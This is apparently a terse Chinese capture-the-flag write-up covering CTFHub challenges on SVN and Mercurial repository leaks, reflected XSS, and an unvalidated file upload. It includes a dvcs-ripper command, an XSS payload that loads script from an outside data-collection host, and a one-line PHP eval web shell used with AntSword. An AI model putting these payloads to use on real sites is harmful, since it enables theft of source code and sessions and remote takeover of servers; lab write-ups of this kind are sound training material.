目录
CTFHUB-SVN泄漏
SVN(subversion)是程序员常用的源代码版本管理软件。一旦出现SVN泄漏黑客可获取网站源代码,一方面是掠夺了网站的技术知识资产,另一方面,黑客还可通过源代码分析其它安全漏洞,从而对网站服务器及用户数据造成持续威胁
---------------------------------------------------------------------------------------------
首先先下载:dvcs-ripper(在kali中)
./rip-svn.pl -v -u http://challenge-3b6d43d72718eefb.sandbox.ctfhub.com:10080/.svn/
进行相关配置和组件
sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl
进入工具目录/dvcs-ripper,执行下面命令
HG泄露
hit:当开发人员使用 Mercurial 进行版本控制,对站点自动部署。如果配置不当,可能会将.hg 文件夹直接部署到线上环境。这就引起了 hg 泄露漏洞。
XSS反射型
跨站脚本攻击XSS(Cross Site Scripting):
具体可参考https://www.cnblogs.com/csnd/p/11807592.html
而反射型xss则不是这样,每次触发只能手动输入和点击才能触发。
我认为xss产生的原因主要是对html标签审查不严格造成的。
--------------------------
题目说有xss所以去XSS平台搞一个承接数据的网址。https://xssaq.com/xss.php?do=project&act=view&id=11589
复制</tExtArEa>'"><sCRiPt sRC=https://xssaq.com/YG2V></sCrIpT>
返回平台打开
文件上传 --无验证
在记事本中写入
<?php eval($_POST['123'])?>
取名为a.txt 保存之后又改名为a.php 上传
用蚁剑